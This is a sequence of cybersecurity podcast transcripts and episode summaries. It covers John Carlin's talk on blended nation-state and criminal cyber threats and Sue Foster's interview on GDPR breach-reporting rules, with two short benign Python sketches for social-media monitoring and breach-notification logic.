So, why did we do that? Why were we treating this like a serious national security event that had presidential attention? The attack had multiple parts. One was, just like the attack on Sands Casino, it essentially turned computers into bricks. Secondly, they stole, so this is like the economic espionage threat. They stole intellectual property, and they distributed it using a third party, the WikiLeaks-type example. Using third parties, they distributed that stolen intellectual property and tried to cause harm to Sony. Nobody remembers those two. What everybody remembers, and this is the weaponizing-of-information idea, is that by focusing on a soft target like email, it was the salacious email communications between executives inside the company that got such massive media attention. That and, of course, the fact that it's a movie company. That lesson did not go unnoticed, and so there's a lot of focus on it and we'll talk about it later. It was used again, clearly, in the Russian attempt to influence elections, not just here in the United States in our most recent election cycle, but before that in elections across Europe. You can see them trying to use similar tactics and techniques right now when it comes to the French election. They clearly stumbled on the fact that, "Hey, it's not just the information inside a company that people put great safeguards around, like their crown-jewel intellectual property. It can be the softer parts, like email, like routine communications, that if we gather in bulk we can weaponize and use to cause harm to the company."
The reason why we treated that as such a serious national security concern in the White House was because of the reason behind the attack. Just like the attack on Sands Casino, this attack on Sony was fundamentally an attack on our values. It was an attack on the idea that we have free speech. And similarly, the Russian attempts are fundamentally an attack on the idea of democracy. That's why they're attacking democratic institutions not just here in the United States, but across the world.
For you in the private sector, as you're designing your systems and thinking this through, you need products that allow you to monitor broadly what types of attacks are occurring within your perimeter, so you can get ahead of a weaponized-information attack. That means fortifying defenses beyond those required by legislation or regulation. In order to do that, it means figuring out and using products that are business-friendly. By that I mean, you may be the best information technology folks in the world, but if your business side can't understand the tools that you're using or the risks that you're trying to describe to them, then you can't engage them on what could really harm the company most. And that's what you need in order to do your job, to figure out what that is.
Another thing we can work on now is responding quickly, because of how fast these events occur. And these days, the best practice is to monitor social media. Now, I know a couple of companies that are monitoring social media, and in part it's not just for cyber crises, right? Every crisis moves that quickly. Some are monitoring it because a certain president of the United States right now will occasionally tweet something out in the middle of the night, and if he singles you out, he can cause your share price to torpedo by the time the market opens. So certainly, a couple of companies who've actually been through that have rapid communications plans in place, and we have other clients now that, just as a best practice, essentially have a team monitoring that Twitter account from 3 a.m. to 6 a.m. so they can get a communication into the mainstream media before the stock market opens.
That's the same idea when it comes to having systems in place so you're monitoring social media for mentions of your company and then having a rapid response plan ready. That can also benefit greatly from your understanding of your own systems. If you know where the stolen data lives and think through with your business side how it could be used, you can get in front of it suddenly appearing on WikiLeaks, some other site, or just Twitter, and be ready with a rapid response that addresses your business risk.
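Purely as an illustration of the kind of monitoring loop described above, here is a minimal Python sketch. The company name, the feed function, and the paging hook are hypothetical placeholders, not a reference to any specific social listening product or API; a real setup would wire these to whatever listening and alerting tools the organization already uses.

```python
# Minimal sketch: watch for public mentions of the company and trigger the
# pre-agreed rapid-response plan. fetch_recent_posts() and page_incident_team()
# are hypothetical stand-ins for a real social listening feed and paging system.
import time

WATCH_TERMS = ["ExampleCorp", "ExampleCorp breach", "ExampleCorp leak"]  # hypothetical company name

def fetch_recent_posts(term: str) -> list[str]:
    """Placeholder: return recent public posts mentioning `term`."""
    return []  # wire this to a real social listening source

def page_incident_team(post: str) -> None:
    """Placeholder: kick off the pre-agreed communications/response plan."""
    print(f"ALERT - possible weaponized-information event: {post}")

def monitor(poll_seconds: int = 60) -> None:
    seen: set[str] = set()
    while True:
        for term in WATCH_TERMS:
            for post in fetch_recent_posts(term):
                if post not in seen:          # avoid re-alerting on the same post
                    seen.add(post)
                    page_incident_team(post)
        time.sleep(poll_seconds)

if __name__ == "__main__":
    monitor()
```

The design point is less the code than the workflow: detection feeds directly into a response plan that the business side has already signed off on, so nobody is improvising at 3 a.m.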
I want to focus a little bit, as we did, on this idea of working together, government and the private sector. I'm gonna go back to the economic espionage case for a second, the China case. When we did that PLA case, for years before, when I was doing the criminal cases, I think companies didn't work with law enforcement because they figured, "What's the upside?" I'll just talk about that China case, but that case, the indictment of the People's Liberation Army, changed Chinese behavior, maybe not forever, but for now. What moved President Xi, I think, was that case plus the response to Sony, where we used the same type of response when it came to North Korea. And look, it was incredibly beneficial to Sony when we were able to say that it was North Korea. Until then, all of the attention was on Sony: "What did they do wrong? Why weren't their systems better? Isn't it ridiculous what their executives were saying?" After we could say that it was North Korea, the narrative changed to, "Hey, Government, what are you doing to protect us against nation-state threats?" That is why attribution can matter.
And what did the government do? We applied, now for the second time, the approach that we'd applied for the first time with the People's Liberation Army: number one, figure out who did it. That required working closely with the company to figure out not just what they took, but why they would have taken it, what could have precipitated the event. Number two, collect the information in a way that we can make it public. And number three, use it to cause harm to the adversary. In Sony, unlike in the PLA case, we didn't have a criminal case available to us, so instead of a criminal case you saw us publicly announce through the FBI who did it, and then use that as a basis to sanction North Korea. Sitting around the Situation Room table, we realized we were lucky it was North Korea. If it had been some other cyber actor, one who hadn't done so many other bad things, we wouldn't have been able to sanction them the way you can sanction terrorists or those who proliferate weapons of mass destruction.
So, going forward, the president signed a new executive order that allows us to sanction cyber actors. Significantly, that order allows you, to use the PLA example, to sanction not just those who take the information, but the companies who make money off of it, those who profit from the stolen information. I think it was that combination, the new executive order in place, the PLA case, and the realization that we could make things public and cause harm, that caused President Xi, the leader of China, to blink and sign an unprecedented agreement with President Obama. He sent a crew, we negotiated with them day and night for several days, and they said for the first time, "Hey, we agree, using your military intelligence to target private companies for the benefit of their economic competitors is wrong, and we agree that there should be a norm that you don't do that." That led the G20 to sign on as well, and since then, in both government and private-group monitoring, we have seen a decrease in how China is targeting private companies. Now, as some of you may be seeing, their definition of what counts as theft for private gain and ours might differ, there are certainly sectors that are still getting hit, and traditional intelligence collection continues.
After WannaCry, U.S. lawmakers introduced the Protecting Our Ability to Counter Hacking Act of 2017, or PATCH Act. If the bill passes, it would create a Vulnerabilities Equities Process Review Board to decide whether a vulnerability known to the government should be disclosed to a non-government entity. It won’t be an easy law to iron out, as lawmakers will need to find the right balance between vulnerability disclosure and national security.
Meanwhile, the Shadow Brokers, the hacking group that leaked the SMBv1 exploit that led to WannaCry, announced that they would create a subscription-based business giving paying members a monthly data dump of zero-days and exploits.
Grounded in our post-WannaCry world, the Inside Out Security Show panelists – Cindy Ng, Mike Thompson and Kilian Englert – mulled over a popular philosophical keynote by Cory Doctorow, The Coming War on General-Purpose Computing.
We closed out the show by discussing another potentially damaging attack, Adylkuzz, and whether the panelists would prefer an attack like ransomware that announces itself or a cryptocurrency miner that quietly consumes their systems' resources without them ever knowing.
Even though it feels like France’s presidential election happened ages ago, it was a very public security win. The Inside Out Security Show panelists – Cindy Ng, Kris Keyser, Mike Buckbee, and Kilian Englert – broke down how it all unfolded. They also weighed in on the FBI director’s dismissal. What’s relevant about this story for the infosec space is what happens after someone leaves an organization.
Other stories discussed:
Sue Foster is a London-based partner at Mintz Levin. In the second part of the interview, she discusses the interesting loophole for ransomware breach reporting requirements that's currently in the GDPR. However, there's another piece of EU legislation going into effect in May 2018, the NIS Directive, which would make ransomware reportable. Foster also talks about the interesting implications of IoT devices under the GDPR. Is the data collected by your internet-connected refrigerator or coffee pot considered personal data under the GDPR? Foster says it is!
Inside Out Security
Sue Foster is a partner with Mintz Levin based out of the London office. She works with clients on European data protection compliance and on commercial matters in the fields of clean tech, high tech, mobile media, and life sciences. She's a graduate of Stanford Law School. Foster is also, and we like this here at Varonis, a Certified Information Privacy Professional.
I'm very excited to be talking to an attorney with a CIPP, and with direct experience on a compliance topic we cover on our blog — the General Data Protection Regulation, or GDPR.
Welcome, Susan.
Sue Foster
Hi Andy. Thank you very much for inviting me to join you today. There's a lot going on in Europe around cybersecurity and data protection these days, so it's a fantastic set of topics.
IOS
Oh terrific. So what are some of the concerns you're hearing from your clients on GDPR?
SF
So one of the big concerns is getting to grips with the extra-territorial reach. I work with a number of companies that don't have any office or other kind of presence in Europe that would qualify them as being established in Europe.
But they are offering goods or services to people in Europe. And for these companies, you know, in the past they've had to go through quite a bit of analysis to understand whether the Data Protection Directive applies to them. Under the GDPR, it's a lot clearer, and the rules are easier for people to understand and follow.
So now when I speak to my U.S. clients, if they're a non-resident company that promotes goods or services in the EU, including free services like a free app, for example, they'll be subject to the GDPR. That's very clear.
Also, if a non-resident company is monitoring the behavior of people who are located in the EU, including tracking and profiling people based on their internet or device usage, or making automated decisions about people based on their personal data, the company is subject to the GDPR.
It's also really important for U.S. companies to understand that there's a new ePrivacy Regulation in draft form that would cover any provider, regardless of location, of any form of publicly available electronic communication services to EU users.
Under this ePrivacy Regulation, the notion of what these communication services providers are is expanded from the current rules, and it includes things that are called over-the-top applications – so messaging apps and communications features, even when a communication feature is just something that is embedded in a website.
If it's available to the public and enables communication, even in a very limited sort of forum, it's going to be covered. That's another area where U.S. companies are getting to grips with the fact that European rules will apply to them.
There's also a new security regulation that may apply to companies located outside the EU. So all of these things are combining to suddenly force a lot of U.S. companies to get to grips with European law.
IOS
So just to clarify, let's say a small U.S. social media company that doesn't market specifically to EU countries and doesn't have a website in the language of an EU country: would they fall under the GDPR or not?
SF
On the basis of their [overall] marketing activity, they wouldn't. But we would need to understand whether they're profiling or tracking EU users, perhaps through viral marketing that's been going on, right? If they're just tracking everybody, and they know that they're tracking people in the EU, then they're going to be caught.
But if they're not doing that, if they're not engaging in any kind of tracking, profiling, or monitoring activities, and they're not affirmatively marketing into the EU, then they're outside of the scope. Unless, of course, they're offering some kind of service that falls under one of these other regulations that we were talking about.
IOS
What we're hearing from our customers is that the 72-hour breach reporting rule is a concern. Our customers are confused, and after looking at some of the fine print, we are as well! So I'm wondering if you could explain breach reporting in terms of thresholds: what needs to happen before a report is made to the DPAs and to consumers?
SF
Sure, absolutely. So first it's important to look at the specific definition of a personal data breach. It means a breach of security leading to the ‘accidental or unlawful destruction, loss, alteration, unauthorized disclosure of, or access to personal data’. So it's fairly broad.
The requirement to report these incidents has a number of caveats. So you have to report the breach to the Data Protection Authority as soon as possible, and where feasible, no later than 72 hours after becoming aware of the breach.
Then there's a set of exceptions. And that is unless the personal data breach is unlikely to result in a risk to the rights and freedoms of natural persons. So I can understand why U.S. companies would sort of look at this and say, ‘I don't really know what that means’. How do I know if a breach is likely to ‘result in a risk to the rights and freedoms of natural persons’?
Because that's not defined anywhere in this regulation!
It's important to understand that that little bit of text is EU-speak that really refers to the Charter of Fundamental Rights of the European Union, which is part of EU law.
There is actually a document you can look at to tell you what these rights and freedoms are. But you can think of it basically in common sense terms. Are the person's privacy rights affected, are their rights and the integrity of their communications affected, or is their property affected?
So you could, for example, say that there's a breach that isn't likely to reveal information that I would consider personally compromising in a privacy perspective, but it could lead to fraud, right? So that could affect my property rights. So that would be one of those issues. Basically, most of the time you're going to have to report the breach.
When you're going through the process of working out whether you need to report the breach to the DPA, and you're considering whether or not the breach is likely to result in a risk to the rights and freedoms of natural persons, one of the things that you can look at is whether people are practically protected.
Or whether there's a minimal risk because of steps you've already taken such as encrypting data or pseudonymizing data and you know that the key that would allow re-identification of the subjects hasn't been compromised.
So these are some of the things that you can think about when determining whether or not you need to report to the Data Protection Authority.
If you decide you have to report, you then need to think about ‘do you need to report the breach to the data subjects’, right?
And the standard there is that it has to be a ‘high risk to the rights and freedoms’ of natural persons. So a high risk to someone's privacy rights, or rights in their property, and things of that sort.
And again, you can look at the steps that you took before the data was even leaked to prevent it from being in a format where people could be damaged. Or you can consider whether you've taken steps after the breach that would prevent those kinds of risks from materializing.
Now, of course, the problem is the risk of getting it wrong, right?
If you decide that you're not going to report after you go through this full analysis and the DPA disagrees with you, you're now running the risk of a fine of up to 2% of the group’s global turnover, or gross revenue around the world.
And that, I think, is going to lead a lot of companies to report out of caution, even when they might have been able to take advantage of some of these exceptions, because they won't feel comfortable relying on them.
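To make the two thresholds Foster describes easier to follow, here is a hedged Python sketch of the decision logic: report to the DPA unless the breach is unlikely to risk people's rights and freedoms, and additionally notify data subjects when that risk is high. The risk levels and mitigation flags are simplified assumptions for illustration only, not legal advice or an official regulatory test.

```python
# Simplified sketch of the GDPR notification analysis discussed above.
from dataclasses import dataclass

@dataclass
class Breach:
    data_categories: list          # e.g. ["names", "card numbers", "CVV"]
    encrypted_and_key_safe: bool   # data encrypted/pseudonymized and the key not compromised
    risk_level: str                # assessed after review: "minimal", "risk", or "high"

def must_report_to_dpa(b: Breach) -> bool:
    # Exception: unlikely to result in a risk to rights and freedoms,
    # for example because the data was effectively protected.
    if b.encrypted_and_key_safe and b.risk_level == "minimal":
        return False
    return True  # report without undue delay, where feasible within 72 hours

def must_notify_data_subjects(b: Breach) -> bool:
    # Higher threshold: only when the breach is likely to result in a HIGH risk.
    return b.risk_level == "high"

card_breach = Breach(["names", "card numbers", "CVV"],
                     encrypted_and_key_safe=False, risk_level="high")
print(must_report_to_dpa(card_breach), must_notify_data_subjects(card_breach))  # True True
```

In practice, as Foster notes, the safe default for anything ambiguous is likely to be reporting, since guessing wrong about the exception carries the fine.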
IOS
I see. So just to bring it to more practical terms: we can assume that if, let's say, credit card numbers or some other identification numbers were breached or taken, that would have to be reported both to the DPA and to the consumer?
SF
Most likely. I mean, yeah, almost certainly. Particularly if the security code on the back of the card has been compromised, you've absolutely got a pretty urgent situation. You also have a responsibility to provide a risk assessment to the individuals and advise them on steps they can take to protect themselves, such as canceling their card immediately.
IOS
One hypothetical that I wanted to ask you about is the Yahoo breach, which technically happened a few years ago. I think it was over two years ago … Let's say something like that had happened after the GDPR where a company sort of had known that there was something happening that looked like a breach, but they didn't know the extent of it.
If they had not reported it, and waited until after the 72-hour rule, what would have happened to let's say a multinational like Yahoo?
SF
Well, Yahoo would need to go through the same analysis, and it's hard to imagine otherwise, given a breach on that scale, the level of access that was provided to Yahoo users' accounts as a result of those breaches, and of course the fact that it's very common for individuals to reuse passwords across different sites, so you have the risk of follow-on problems.
It's hard to imagine they would be in a situation where they would be off the hook for reporting.
Now the 72-hour rule is not hard and fast.
But the idea is you report as soon as possible. So you can delay for a little while if it's necessary for say a law enforcement investigation, right? That's one possibility.
Or if you're doing your own internal investigation and somehow that would be compromised or taking security measures would be compromised in some way by reporting it to the DPA. But that'll be pretty rare.
Obviously, going along for months and months without reporting it would be beyond the pale. And I would say a company like Yahoo would potentially be facing a fine of 2% of its worldwide revenue!
IOS
So this is really serious business, especially for multinationals.
This is also a breach reporting related question, and it has to do with ransomware. We're seeing a lot of ransomware attacks these days. In fact, when we visit customer sites and analyze their systems, we sometimes see these attacks happening in real time. Since a ransomware attack encrypts the file data but most of the time doesn't actually take the data or the personal data, would that breach have to be reported or not?
SF
This is a really interesting question! I think the by-the-book answer is, technically, if a ransomware attack doesn't lead to the accidental or unlawful destruction, loss, or alteration or unauthorized disclosure of or access to the personal data, it doesn't actually fall under the GDPR's definition of a personal data breach, right?
So, if a company is subject to an attack that prevents it from accessing its data, but the intruder cannot itself access, change, or destroy the data, you could argue it's not a personal data breach and therefore not reportable.
But it sure feels like one, doesn't it?
IOS
Yes, it does!
SF
Yeah. I suspect we're going to find that the new European Data Protection Board will issue guidance that somehow brings ransomware attacks into the fold of what's reportable. Don't know that for sure, but it seems likely to me that they'll find a way to do that.
Now, there are two important caveats.
Even though, technically, a ransomware attack may not be reportable, companies should remember that a ransomware attack could cause them to be in breach of other requirements of the GDPR, like the obligation to ensure data integrity and accessibility of the data.
Because by definition, you know, the ransomware attack has made the data inaccessible and has totally corrupted its integrity. So, there could be liability there under the GDPR.
And also, the company that's suffering the ransomware attack should consider whether they're subject to the new Network and Information Security Directive, which is going to be implemented in national laws by May 9th of 2018. So again, May 2018 being a real critical time period. That directive requires service providers to notify the relevant authority when there's been a breach that has a substantial impact on the services, even if there was no GDPR personal data breach.
And the Network and Information Security Directive applies to a wide range of companies, including those that provide "essential services”. Sort of the fundamentals that drive the modern economy: energy, transportation, financial services.
But also, it applies to digital service providers, and that would include cloud computing service providers.
You know, there could be quite a few companies that are being held up by ransomware attacks who are in the cloud space, and they'll need to think about their obligations to report even if there's maybe not a GDPR reporting requirement.
IOS
Right, interesting. Okay. As a security company, we've been preaching Privacy by Design principles, data minimization, and retention limits, and in the GDPR it's now actually part of the law.
The GDPR is not very specific about what has to be done to meet these Privacy by Design ideas, so do you have an idea what the regulators might say about PbD as they issue more detailed guidelines?
SF
They'll probably tell us more about the process but not give us a lot of insight as to specific requirements, and that's partly because the GDPR itself is very much a show-your-work regulation.
You might remember back on old, old math tests, right? When you were told, ‘Look, you might not get the right answer, but show all of your work in that calculus problem and you might get some partial credit.’
And it's a little bit like that. The GDPR is a lot about process!
So, the push for Privacy by Design is not to say that there are specific requirements other than paying attention to whatever the state of the art is at the time. So, really looking at the available privacy solutions at the time and thinking about what you can do. But a lot of it is about just making sure you've got internal processes for analyzing privacy risks and thinking about privacy solutions.
And for that reason, I think we're just going to get guidance that stresses that, develops that idea.
But any guidance that told people specifically what security technologies they needed to apply would probably be good for, you know, 12 or 18 months, and then something new would come along.
Where we might see some help is, eventually, in terms of ISO standards. Maybe there'll be an opportunity in the future for something that comes along that's an international standard, that talks about the process that companies go through to design privacy into services and devices, etc. Maybe then we'll have a little more certainty about it.
But for now, and I think for the foreseeable future, it's going to be about showing your work, making sure you've engaged, and that you've documented your engagement, so that if something does go wrong, at least you can show what you did.
IOS
That's very interesting, and a good thing to know. One last question: we've been following some of the security problems related to Internet of Things devices, which are gadgets on the consumer market that can include internet-connected coffee pots, cameras, and children's toys.
We've learned from talking to testing experts that vendors are not really interested in PbD. It's ship first, maybe fix security bugs later. Any thoughts on how the GDPR will affect IoT vendors?
SF
It will definitely have an impact. The definition of personal data under the GDPR is very, very broad. So, effectively, anything I say that a device picks up is my personal data, as well as data about me, right?
So, if you think about a device that knows my shopping habits that I can speak to and I can order things, everything that the device hears is effectively my personal data under the European rules.
And Internet of Things vendors do seem to be lagging behind in Privacy by Design. I suspect we're going to see investigations and fines in this area early on, when the GDPR starts being enforced in May 2018.
Because the stories about the security risks of, say, children's toys have really caught the attention of the media and the public, and the regulators won't be far behind.
And now, we have fines for breaches that range from 2% to 4% of a group's global turnover. It's an area that is ripe for enforcement activity, and I think it may be a surprise to quite a few companies in this space.
It's also really important to go back to this important theme that there are other regulations, besides the GDPR itself, to keep track of in Europe. The new ePrivacy Regulation contains some provisions targeted at the Internet of Things, such as the requirement to get consent from consumers for machine-to-machine transfers of communications data, which is going to be very cumbersome.
The [ePrivacy] Regulation says you have to do it; it doesn't really say how you're going to get consent, meaningful consent, which is a very high standard in Europe, to these transfers when there's no real intelligent interface between the device and the consumer who's using it. Some devices have maybe a kind of web dashboard, or an app you use to communicate with your device, so you could have privacy settings there.
There's other stuff that's much more behind the scenes with the Internet of Things, where the user doesn't have a high level of engagement. So, maybe a smart refrigerator that's relaying information about energy consumption to, you know, the grid. Even there, there's potentially information where the user is going to have to consent to the transfer.
And it's hard to kind of imagine exactly what that interface is going to look like!
I'll mention one thing about the ePrivacy Regulation. It's in draft form. It could change, and that's important to know. It's not likely to change all that much, and it's on a fast-track timeline because the Commission would like to have it in place and ready to go in May 2018, the same time as the GDPR.
IOS
Sue Foster, I'd like to thank you again for your time.
SF
You're very welcome. Thank you very much for inviting me to join you today.
Last week, when the world experienced the largest ransomware outbreak in history, it also reminded me of our cybersecurity workforce shortage. When events like WannaCry happen, we can never have too many security heroes!
There was an idea floating around that suggested individuals with a music background might have a promising future in security. The thinking is: if you can pick up music, you can also pick up technology.
The Inside Out Security panelists – Cindy Ng, Mike Thompson, Forrest Temple and Mike Buckbee – are in agreement. Their sentiments extended to all artists, adding that creative thinking along with attention to detail can go a long way.
Other articles discussed:
Sue Foster is a London-based partner at Mintz Levin. She has a gift for explaining the subtleties in the EU General Data Protection Regulation (GDPR). In this first part of the interview, she discusses how US companies can get caught up in either the GDPR's extraterritoriality rule or the e-Privacy Directive's new language on embedded communication. She also decodes the new breach notification rules, and when you need to report to the DPA and consumers. Privacy and IT security pros should find her discussion particularly relevant.
Last week, John P. Carlin, former Assistant Attorney General for the U.S. Department of Justice’s (DOJ) National Security Division, spent an afternoon sharing lessons learned from the DOJ.
And because the lessons have been so insightful, we’ll be rebroadcasting his talk as podcasts.
In part one of our series, John weaves in lessons learned from Ardit Ferizi, hacktivists and WikiLeaks, Russia, and the Syrian Electronic Army. He reminds us that the current threat landscape is no doubt complicated, requiring blended defenses, and he underscores the significance of collaboration between businesses and law enforcement.
John Carlin currently chairs Morrison & Foerster’s global risk and crisis management team.
John Carlin: The threat facing our private companies has reached a level we haven't seen before. That's true for two reasons, really. Some of the threats we're seeing are things the national security community has been monitoring for years, but we've had a change of approach. In the past, while we were monitoring it, it would stay in classified systems. We would watch what nation states or terrorist groups were doing, and we didn't have any method to make it public. So one trend is that governments are starting to make public what they see in cyberspace. The second is that the actual threat itself has increased both in volume and complexity. That's been quite noticeable. In the past year alone, and really the past two years, we've seen cyber incidents that have gotten people's attention at every level. That has caused in government a shift in terms of the regulatory attention that's focused on cybersecurity breaches.
When I recently left government, there was almost an unholy rush across every regulatory and law enforcement agency as they realized what the scope of the threat was and how their existing regulatory or law enforcement authorities were not covering it. That caused them to do two things. One, to try to come up with creative ways to interpret existing regulatory standards so that they can impose liability in the event of a cyber breach. And second, for those who realized that no matter how creative you got there just was no way to bring it within existing regulations, more countries around the world are adopting data breach laws than ever before, most notably Europe coming onboard in 2018, but really it's a global phenomenon. As part of the focus on data breaches, those laws are also starting to impose certain standards of care or specific security obligations. I think it's that combination of increased awareness of the threat plus an increasingly complex and potentially punitive regulatory and law enforcement environment that's made this a top-of-mind issue for C-suites in poll after poll, not just here in the United States but in countries throughout the world. It's new, they're not quite sure what the legal and regulatory landscape looks like, and accordingly, it's the type of thing that keeps them up at night.
For those of you in the information technology space, that could be good news and bad news. It means more scrutiny on what you're doing, but hopefully, as we explain what it is and what can be done, it will also mean more resources. There's the old description of traditional cyber threats, and it's not like any of these have stopped: crooks, nation states, activists, terrorists, everyone who wants to do something bad in the real world moving to cyberspace as we move everything that we value from analog to digital space. The type of activity they engaged in ranged from economic espionage to destruction of information to alteration of information, which I think is a trend we need to watch, this idea that the integrity of your data may be at stake. I know it's top-of-mind for those of us in government responsible for protecting against criminal and national security threats and fraud.
I'm not going to spend too much time on those traditional buckets. I wanted to highlight two new areas of cyber threat that are here now. One is what I'll call the blended threat, and the second is insider threats. Let's start with the blended threat. Imagine you're back at your office, you're in your company, and you spot what looks like a relatively low-level, unsophisticated criminal hack of your system. For many of you, because you handle it yourself, it wouldn't even warrant informing anyone in the C-suite. It would never reach that high in the company. Now imagine that as a result of that relatively unsophisticated hack, you're a trusted brand-name retail company, and the bad guy has managed to steal a relatively small amount of personally identifiable information: some names, some addresses. As you know, that happens, as we speak, to hundreds and thousands of companies across the world. For the vast majority of those companies, faced with an unsophisticated hack where it looked like the IT folks had good control over what had occurred, it would stop there. To the extent it gets reported up to the C-suite, it looks like a simple criminal act and will go unreported.
The case I'm going through with you now, though, is a real case, and what happened next was that several weeks later this company received, through email, it was Gmail, so a commercial provider, a notice that said, "Hey, unless you wanna be embarrassed by the release of these names and addresses, you need to pay us $500 through Bitcoin." As these things go, you can't really think of a dollar figure much lower than $500, and asking for Bitcoin in a Gmail threat does not look particularly sophisticated either. You combine that with great confidence that you've been able to find them on your system and kick them off, and for the vast majority of companies this does not go down as a high-risk event and would not be reported. In the case that I'm discussing, which was a real case, the company did work with law enforcement, and what they found out, and never would have been able to find out on their own, was that what looked like a criminal act, and don't get me wrong, it was criminal, these guys wanted the $500, was also something else. It turned out that on the other end of that hack, on the other end of that keyboard, was an extremist from Kosovo who had moved to Malaysia, working in a conspiracy with a partner still in Kosovo. He'd hacked into this U.S.-based trusted retail company and stolen these names and addresses, and in addition to the $500, he had managed, through Twitter, to befriend one of the most notorious cyber terrorists in the world at the time, a man named Junaid Hussain, from the United Kingdom. Junaid Hussain had moved from the United Kingdom to Raqqa, Syria, where he sat at the very heart of the Islamic State of Iraq and the Levant.
In my old job, I was the top national security lawyer at the Justice Department responsible for protecting against terrorist and cyber threats, and on the terror side of the arena, this guy, Junaid Hussain, along with his cohort in the Islamic State, had mastered a new way of trying to commit terrorist acts. Unlike Al Qaeda, with its trained and vetted operatives, what they were doing was crowdsourcing terror. They were using social media against us, and consistent with that approach, what Junaid Hussain did was befriend this individual who had moved to Malaysia, named Ferizi. He communicated with him through U.S.-provided technology, Twitter, he got a copy of the stolen names and addresses, and then he compiled those names and addresses into a kill list. He distributed that kill list through Twitter back to the United States and said, totally consistent with their new approach of crowdsourcing terror, "Hey, if you believe in the Islamic State, if you're following me, kill these people," by name, by address, where they live.
That's the face of the new threat, one version of the blended threat. I think for any of you, any company, if you knew when you were dealing with the incident, where you'd seen someone breach your system, that the person who breached your system was looking to kill people with the information they stole, that would immediately be a C-suite event, your crisis risk plans would go into place, and you would certainly be contacting law enforcement. The problem with the blended threat, these guys who are crooks on the one hand and working on behalf of a terrorist or a nation state on the other, is that you don't know.
Because they did work together, in this case, Ferizi, the guy responsible, was arrested in Malaysia pursuant to U.S. charges, extradited after cooperation from Malaysia, pled guilty, and was sentenced this past July to 20 years in federal prison. And Junaid Hussain, who was operating in ungoverned space in Raqqa, Syria, was killed in a military strike acknowledged by Central Command. This issue, that it puts your companies on the front lines of national security threats in a way that simply never happened before, and there's not another area of threat with the same effect, requires new approaches in terms of security and in the ways that the federal government interacts with private companies.
Let me go through some other examples of this blended threat phenomenon. If you think about what happened with WikiLeaks, you have WikiLeaks acting as a distributor of information, but it's not necessarily the hacktivist who steals the information. So you see the breach into your system, but you're not quite sure how it's gonna be used. Is it gonna be used by someone who wants to make money? Is it gonna be used by someone who has very specific intelligence purposes? It used to be the case, certainly the assumption for those of us in government working with the private sector, that if you had information stolen by a nation state, unless you had some economic espionage issue, you really didn't need to worry about the nation state using it against you, and that's clearly no longer the case. What you see here with something like Russia and the DNC is information taken in one sphere that then gets leveraged and put out through another. So a nation state steals it, and then they have the shield of WikiLeaks for the distribution of the information.
You also have, with Russia, another version of the blended threat: what look like nation-state actors. Let's use the most recent Justice Department case against the Russian actors who attacked Yahoo. What you had there were crooks, I mean, straight-up crooks, who were Russian and out to make a profit, and there was an attempt at law-enforcement-to-law-enforcement cooperation: U.S. law enforcement authorities passed information to the Russians to try to hold those crooks responsible. What you got instead of cooperation, and this is all laid out in the complaint, is that the Russians signed up the crooks as intelligence assets and used them to continue to steal information and to hand over some of what they'd stolen, so that the same guy was making a profit on one hand but also providing it for state purposes.
That version of the blended threat has a slight variation, in which the actor's day job is Russian state security service hacker, or Chinese state security service hacker, but there's a lot of corruption in both countries. They wanna make a buck on the side: same actor, same system, daytime working on behalf of the state, nighttime looking to line their pockets with profits. What you're trying to figure out on the back end of that attack, "Hey, what type of risk am I dealing with? Am I in a national security situation or a criminal situation?", can be incredibly complicated. And that's combined with deliberate blending. As we've moved toward doing attribution, you'll see state actors, whether Russian, Chinese, or others, no longer using the same sophisticated tools they used in the past to breach your system, tools that were identifiable. Back then you could tell by the TTPs, the tactics, the techniques, the procedures, that you were dealing with a state actor from Russia or China or another sophisticated state. Now they're using the same easily available tools that low-level crooks use, in the first instance looking to see if they can get in through human error or weaknesses in the defenses, and that makes it much harder to do the attribution.
The final version of the blended threat would be the Syrian Electronic Army. Many of you may be familiar with this group. You know, it's in vogue now, everyone's talking about fake news; well, they're the original fake news case that we did. When we prosecuted the Syrian Electronic Army, what they had done was spoof a terrorist attack on the White House by hijacking the Associated Press's Twitter account. That was very successful and caused the loss of billions of dollars in the stock market until people realized it was a hoax. That same group, though, was regularly committing ransomware-type offenses; they just weren't calling themselves the Syrian Electronic Army when they did it. Many of your companies would have a policy in place that would flag it as a high area of risk and say, "We're not gonna make a payment if we know we're paying off the Syrian Electronic Army," or, in the case of Ferizi, if we knew we were paying off a terrorist, but the problem is you don't know. And as was laid out in the complaint when we arrested one of those individuals in Germany, I don't think even the people operating them, running them from the Syrian Electronic Army, knew that they were using the same tools on the side to make a buck.
So what lessons can you learn, and how can we help protect our systems, recognizing this change in threat? Well, one is that as the criminal groups, and the sophisticated programs and vulnerabilities you can buy on the dark web, become more and more blended with the nation states and terrorist groups taking advantage of them, we need to ask ourselves, "Are our defenses as blended as the threat?" Inside the company, that means making sure we crosscut those who are responsible for preventing and minimizing risk. It doesn't stop at saying, "Hey, maybe we can build a wall high enough or deep enough to keep someone out," because that doesn't exist. Once they're inside and we're dealing with the actual threat, who do I have in my company who's involved? Is there a way to make that information easily available to the business side so we can get their informed views on what information should be protected and how, to mitigate risk on the front end, and then on how to respond? And similarly, are we working together, as companies, and as a government with companies, the way the bad guys are working with the nation states or terrorist groups sponsoring them? That's where there's focus now: figuring out a better way to do cooperation between business and law enforcement is vital.
The division I used to head, the National Security Division, was created as one of the reforms after September 11th, and the idea was that post-September 11th, we've got to get better at sharing information across the law enforcement and intelligence divide. The failure to share that type of information led to the death of thousands of people on September 11th. This challenge of how to share information about what the government is seeing on the threat, and how to receive information back, is exponentially more complicated, because it's not just about sharing information better within government or within your company, it's how to share information across government to the private sector and back again.
Rather than referring to our weekly podcast panelists as security experts, we’re now introducing them as security practitioners. Why? A popular business article on mindset brought to our attention the perils of self-proclaimed titles, such as expert and guru. It signals that our “thirst for knowledge in a particular subject has been quenched.” That is far from reality! Security is a constantly evolving field, with new threats and vulnerabilities. To have a fighting chance, it would behoove us to start by cultivating a curious learner mindset by asking, “Why?” and “How does this work?”
As reformed security know-it-alls, here are some of the stories we covered:
There’s been a long-held stigma amongst our infosec cohort, and it’s getting in the way of doing business. What’s the stigma, you ask? “Know-it-all” techies who are unable to communicate. Unfortunately, this shortcoming also puts our jobs at stake.
According to a recent cybersecurity survey, board members polled said that IT and security executives will lose their jobs because of their failure to provide the board with useful, actionable information. It gets worse: more than half of board members say that the data presented is too technical.
In an effort to redeem ourselves and understand the problem, I suggested role-playing with the Inside Out Security panel – Cindy Ng, Kilian Englert, Mike Buckbee, and Kris Keyser – to practice speaking with executives about cybersecurity.
